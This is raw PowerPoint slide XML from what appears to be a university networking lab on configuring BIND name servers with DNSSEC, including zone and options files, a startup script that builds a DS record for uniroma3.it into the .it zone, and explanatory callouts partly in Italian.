            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="112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include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named.conf.options</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zone "."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 master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file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db.root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dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;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inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C73572-FC25-5AD7-809B-99DCCF201795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="13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nsroot</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0AFFE3A3-6323-9C91-B85F-F408870F8A31}"/>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F1B52177-57B9-3ADE-2EE0-DEB2F44CC577}"/>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BF48DAD1-06F5-AB17-3980-9AB1B4C73B2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8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07C9D9D-B1B2-2BBB-424B-06E4D5F028AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7251554" y="1989011"/>
            <a:ext cx="4580105" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85203"/>
              <a:gd name="adj2" fmla="val 20127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Enable automatic DNSSEC key management using BIND's default policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62001C25-C7F1-6BF9-EE12-8554EFB48C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3061162"/>
            <a:ext cx="3830316" cy="569247"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121810"/>
              <a:gd name="adj2" fmla="val 10385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enable "inline signature".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5293C90B-44DD-DD35-F82E-2CDF8D063934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="1675313"/>
            <a:ext cx="1918176" cy="1550954"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88294"/>
              <a:gd name="adj2" fmla="val 38616"/>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declares that this server is the master (primary) for this zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F612E8-2FAB-EDAD-D4A7-5497ADAF3246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20458" y="3705859"/>
            <a:ext cx="2311610" cy="1550955"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69528"/>
              <a:gd name="adj2" fmla="val -7091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Indicates the path to the text file containing the DNS records for the zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776713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C1DEF-259A-9C63-CAA3-C5B077C6E359}"/>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1B1232B1-1A5E-8714-A73E-DF5B10F2F8A1}"/>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B798E886-07E0-264F-6F06-664834E62825}"/>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F0ED7B49-CB4D-C832-A6AE-FF84E26F9E72}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC983A7B-8EFE-2410-AD38-BC4FBC54E075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C7CEA44-4610-BB8B-675E-E9A5CC89EA87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6AB85C-885C-79E7-4D12-FD8DE6069F2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837"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nsroot</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named.conf.options</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622099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B0976-874C-E9E7-C09B-B1B3BFDB4654}"/>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39FB7B57-CAB8-D6B7-4561-F026276F1AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="514597" y="1138080"/>
            <a:ext cx="11336587" cy="5000627"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9171" cy="1761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54689BD7-574E-2EAC-39BE-8E50053CF955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9171" cy="170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10.0.3.10/24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110.0.0.0/24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210.0.3.0/24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200.1.1.0/24 via 10.0.3.2</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195.0.10.0/24 via 10.0.3.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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  while ! dig @110.0.0.10 uniroma3.it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @110.0.0.10 uniroma3.it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - uniroma3.it &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</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D6586E48-0763-548A-E77D-7089600BEF8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>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nsit.startup</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2E75E1ED-1AD6-37F9-FD2D-696BB38C349C}"/>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14EFB309-86FA-CFB8-F9E5-2B0F77D0D894}"/>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C1753436-BE3A-1254-FF60-E88168095204}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A3A26C-DCB8-4CB1-AABE-B8C0B14B63EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8445741" y="1771168"/>
            <a:ext cx="3405443" cy="1886432"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90759"/>
              <a:gd name="adj2" fmla="val 8472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it-IT" dirty="0"/>
              <a:t>Interroga ripetutamente il server dell'Università (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, IP 110.0.0.10) chiedendo le sue chiavi pubbliche (DNSKEY) per la zona uniroma3.it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0AAE9F5-E7C2-7CFA-DFDC-F8CE41868B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7006848" y="4643252"/>
            <a:ext cx="3405443" cy="760022"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -135046"/>
              <a:gd name="adj2" fmla="val -5113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t>adds a blank line to the end of the .it TLD zone file (db.it)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280739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CFEEA-D157-E807-6EE4-890A6300AD9E}"/>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CF42E715-7A3B-BA29-B532-C730C16A6CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="514597" y="1138080"/>
            <a:ext cx="11336587" cy="5000627"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9171" cy="1761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2753F5-A721-40A7-D1FA-C9AE70DFDF98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9171" cy="170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10.0.3.10/24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110.0.0.0/24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210.0.3.0/24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200.1.1.0/24 via 10.0.3.2</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195.0.10.0/24 via 10.0.3.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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  while ! dig @110.0.0.10 uniroma3.it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @110.0.0.10 uniroma3.it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - uniroma3.it &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</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FC812BDE-A321-48DF-55BF-DA283EC4847C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>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nsit.startup</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B19FBA10-EB81-165F-FA0E-39E9B7586985}"/>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A2588A69-EE69-0DA9-2832-B0DDE3E69FBA}"/>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6EA48B8F-2C3A-8DF8-731D-2713D1C4DD3A}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8354182F-3686-E191-80FE-725BB6680FD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5634633" y="1054992"/>
            <a:ext cx="6272177" cy="2122500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41687"/>
              <a:gd name="adj2" fmla="val 126066"/>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t>Generates the cryptographic "bridge" between .it and uniroma3.it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gets the public key (DNSKEY) from the University.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passes it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec-dsfromkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool, which calculates the hash (fingerprint) and creates the DS (Delegation Signer) record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds this DS record to the "parent" zone file (db.it).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77FFA79-AE17-07B1-1187-60C89F19BF29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
